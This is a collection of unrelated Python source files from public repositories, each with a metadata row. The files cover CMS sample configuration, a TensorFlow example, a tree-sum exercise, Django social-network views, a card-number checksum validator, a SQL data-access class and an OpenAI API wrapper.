'MC_Phase2_113X' : 'auto:phase2_realistic_T15',
'MC_RUN3_122X' : '122X_mcRun3_2021_realistic_v9'
}
def IsEmbedded(sampleType):
isEmbedded = sampleType in mcSampleTypes and 'Emb' in sampleType
if not sampleType in mcSampleTypes and not sampleType in dataSampleTypes:
print ("ERROR: unknown sample type = '{}'".format(sampleType))
sys.exit(1)
return isEmbedded
def IsData(sampleType):
isData = sampleType in dataSampleTypes
if not isData and not sampleType in mcSampleTypes:
print ("ERROR: unknown sample type = '{}'".format(sampleType))
sys.exit(1)
return isData
def GetPeriod(sampleType):
if sampleType not in periodDict:
print ("ERROR: unknown sample type = '{}'".format(sampleType))
sys.exit(1)
return periodDict[sampleType]
def GetGlobalTag(sampleType):
if sampleType not in globalTagMap:
print ("ERROR: unknown sample type = '{}'".format(sampleType))
sys.exit(1)
return globalTagMap[sampleType]
def isRun2UL(sampleType):
if sampleType not in periodDict:
print ("ERROR: unknown sample type = '{}'".format(sampleType))
sys.exit(1)
return sampleType in ['MC_UL16', 'MC_UL16APV', 'MC_UL17', 'MC_UL18', 'RunUL2018']
def isPhase2(sampleType):
if sampleType not in periodDict:
print ("ERROR: unknown sample type = '{}'".format(sampleType))
sys.exit(1)
return sampleType in ['MC_Phase2_113X', 'MC_Phase2_111X', 'MC_Phase2_110X']
def isRun2PreUL(sampleType):
if sampleType not in periodDict:
print ("ERROR: unknown sample type = '{}'".format(sampleType))
sys.exit(1)
return sampleType in ['MC_16', 'MC_17', 'MC_18','Run2018ABC','Run2018D','Emb_18ABC','Emb_18D']
def isRun3(sampleType):
if sampleType not in periodDict:
print ("ERROR: unknown sample type = '{}'".format(sampleType))
sys.exit(1)
return sampleType in ['MC_RUN3_122X']
def GetPeriodCfg(sampleType):
period = GetPeriod(sampleType)
if period == 'Run2016':
from Configuration.Eras.Era_Run2_2016_cff import Run2_2016
return Run2_2016
elif period == 'Run2017':
from Configuration.Eras.Era_Run2_2017_cff import Run2_2017
return Run2_2017
elif period == 'Run2018':
from Configuration.Eras.Era_Run2_2018_cff import Run2_2018
return Run2_2018
elif period == 'Phase2':
from Configuration.Eras.Era_Phase2C9_cff import Phase2C9
return Phase2C9
elif period == 'Run3':
from Configuration.Eras.Era_Run3_cff import Run3
return Run3
else:
raise RuntimeError('Period = "{}" is not supported.'.format(period))
| dimaykerby/DisTauMLTools | Production/python/sampleConfig.py | sampleConfig.py | py | 5,075 | python | en | code | 0 | github-code | 50 |
41154480733 | import tensorflow as tf
W = tf.Variable([.3], tf.float32, name='weight')
b = tf.Variable([-.3], tf.float32, name='bias')
x = tf.placeholder(tf.float32)
linear_model = W * x + b
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
print(sess.run(linear_model, {x: [1, 2, 3, 4]}))
| shirakiya/practice-tensorflow | get_started/variable.py | variable.py | py | 320 | python | en | code | 0 | github-code | 50 |
70082184477 | class Node:
def __init__(self, data):
self.left = None
self.right = None
self.data = data
def TreeSumming(node, sum, val):#O(2^h)
left = False
right = False
if node.left == None and node.right == None:
return sum == val
if node.left != None:
left = TreeSumming(node.left, sum+node.left.data, val)
if node.right != None:
right = TreeSumming(node.right, sum+node.right.data, val)
return left or right
root = Node(5)
root.left = Node(4)
root.left.left = Node(11)
root.left.left.left = Node(7)
root.left.left.right = Node(2)
root.right = Node(8)
root.right.left = Node(13)
root.right.right = Node(4)
root.right.right.right = Node(1)
print(TreeSumming(root, root.data, 22)) | amchp/ST0245-001 | laboratorios/lab04/ejercicioEnLinea/TreeSumming.py | TreeSumming.py | py | 746 | python | en | code | 0 | github-code | 50 |
709736238 | from django.shortcuts import render
from django.core import serializers
from django.http import JsonResponse
from django.core.serializers.json import DjangoJSONEncoder
from mesineapp.models import *
import json
# Create your views here.
def social_network_type(request):
social_network = نوع_شبکه_اجتماعی.objects.filter(حذف = 0)
banner_list=[]
ban =list(social_network.values())
for items in ban:
banners={}
banners['id'] = items['شناسه']
banners['text']=items['متن']
banner_list.append({
'social_network_type' : banners
})
result = {
"ok" : True,
"status_code": 200,
"result":banner_list
}
return JsonResponse(result,json_dumps_params={'indent': 2},safe=False)
def social_network(request):
social_network = شبکه_اجتماعی.objects.filter(حذف = 0)
banner_list=[]
ban =list(social_network.values())
print(ban)
for items in ban:
banners={}
banners['id'] = items['شناسه']
banners['username']=items['نام_کاربری']
if(items['نوع_شبکه_اجتماعی_id'] == 1):
banners['link']= "instagram.com/" + items['نام_کاربری']
if(items['نوع_شبکه_اجتماعی_id'] == 2):
banners['link']= "telegram.me/" + items['نام_کاربری']
banner_list.append({
'social_network' : banners
})
result = {
"ok" : True,
"status_code": 200,
"result":banner_list
}
return JsonResponse(result,json_dumps_params={'indent': 2},safe=False)
| HosseinKeramati/mesine | mesineapp/controllers/social_network.py | social_network.py | py | 1,605 | python | en | code | 0 | github-code | 50 |
70578895835 | # card_no = "5610591081018250"
# Declarations
odd_sum = 0
even_sum = 0
double_list = []
# Checking card number
while True:
card_num = input("Please input your card number(There should be up to 16 digits):")
if len(card_num) == 16:
break
else:
continue
number = list(card_num)
for (idx, val) in enumerate(number):
if idx % 2 != 0:
odd_sum += int(val)
else:
double_list.append(int(val)*2)
# converting the list into a string
double_string = ""
for x in double_list:
double_string += str(x)
# converting the string into a list
double_list = list(double_string)
# adding even numbers
for x in double_list:
even_sum += int(x)
# Adding sum and validation
net_sum = odd_sum + even_sum
if net_sum % 10 == 0:
print('This is a valid card')
else:
print('Invalid card')
| bitmap357/Credit_Card_Validator | Validator App.py | Validator App.py | py | 833 | python | en | code | 0 | github-code | 50 |
6399540886 | from rest_framework import serializers
from .models import Message, ChatRoom
from collections import OrderedDict
class MessageSerializer(serializers.ModelSerializer):
image = serializers.ImageField(allow_null=True)
def to_representation(self, instance):
# this function will remove keys that have None value
result = super(MessageSerializer, self).to_representation(instance)
return OrderedDict([(key, result[key]) for key in result if result[key] is not None])
class Meta:
model = Message
fields = ['__str__', 'content', 'image', 'created_at']
class ChatRoomSerializer(serializers.ModelSerializer):
class Meta:
model = ChatRoom
fields = ['room_image']
| Aron-S-G-H/django-chat-application | chat_app/serializer.py | serializer.py | py | 731 | python | en | code | 6 | github-code | 50 |
70579004635 | import sys
sys.path.append(".")
from dao.daoRRHH import daoRRHH
from modelo.personal import Personal
class daoJRRHH(daoRRHH):
def getRegistrosFiltro(self, Personal):
sql_filtrarNomina = """SELECT `personalRut`, `personalNombre`, `personalGenero`,
`cargoNombre`, `areaNombre`, `departamentoNombre`
FROM `personal` P JOIN `cargo` C ON P.cargoID = C.cargoID
JOIN `departamento` D on P.departamentoID = D.departamentoID JOIN
`area` A on P.areaID = A.areaID
WHERE `personalGenero` LIKE %s AND `cargoNombre` LIKE %s
AND areaNombre LIKE %s AND departamentoNombre LIKE %s LIMIT 10"""
try:
self.cursor.execute(sql_filtrarNomina, ("%"+Personal.personalGenero+"%", "%"+Personal.cargoNombre+"%", "%"+Personal.areaNombre+"%", "%"+Personal.departamentoNombre+"%",))
except Exception as ex:
print(ex)
return self.cursor.fetchall()
| bluuscript/app | dao/daoJRRHH.py | daoJRRHH.py | py | 956 | python | es | code | 0 | github-code | 50 |
4553730026 | import local_secrets as secrets
from openai import AsyncOpenAI
import openai
import logging
#from openai.embeddings_utils import get_embedding as openai_get_embedding
OPENAI_API_KEY = secrets.OPENAI_API_KEY
#COMPLETION_MODEL = 'gpt-3.5-turbo'
#COMPLETION_MODEL = 'gpt-4-32k'
COMPLETION_MODEL = 'gpt-4-1106-preview'
EMBEDDING_MODEL = "text-embedding-ada-002"
MAX_TOKENS = 400
logger = logging.getLogger(__name__)
logger.info('openai_wrapper loaded')
client = openai.OpenAI(api_key=OPENAI_API_KEY)
aclient = AsyncOpenAI(api_key=OPENAI_API_KEY)
def generate(messages, temperature=0, response_format='text'):
print('generate start')
response =''
if response_format == 'text':
rf = { "type": "text" }
else:
rf = { "type": "json_object" }
try:
completion = client.chat.completions.create(
model=COMPLETION_MODEL,
messages=messages,
max_tokens=MAX_TOKENS,
response_format=rf,
temperature=temperature
)
response = completion.choices[0].message.content
except Exception as e:
print('query_model error: ', str(e))
response = "ERROR"
logger.error('agenerate error: ' + str(e))
logger.error(messages)
return response
async def agenerate(messages, temperature=0, response_format='text'):
print('agenerate start')
response =''
if response_format == 'text':
rf = { "type": "text" }
else:
rf = { "type": "json_object" }
try:
completion = await aclient.chat.completions.create(
model=COMPLETION_MODEL,
messages=messages,
max_tokens=MAX_TOKENS,
response_format=rf,
temperature=temperature
)
response = completion.choices[0].message.content
except Exception as e:
print('query_model error: ', str(e))
response = "ERROR"
logger.error('agenerate error: ' + str(e))
logger.error(messages)
print('agenerate done')
return response
def get_embedding(text):
res = client.embeddings.create(
model=EMBEDDING_MODEL,
input=text,
encoding_format="float"
)
return res.data[0].embedding
| cliff-rosen/datatrove | openai_wrapper.py | openai_wrapper.py | py | 2,293 | python | en | code | 0 | github-code | 50 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.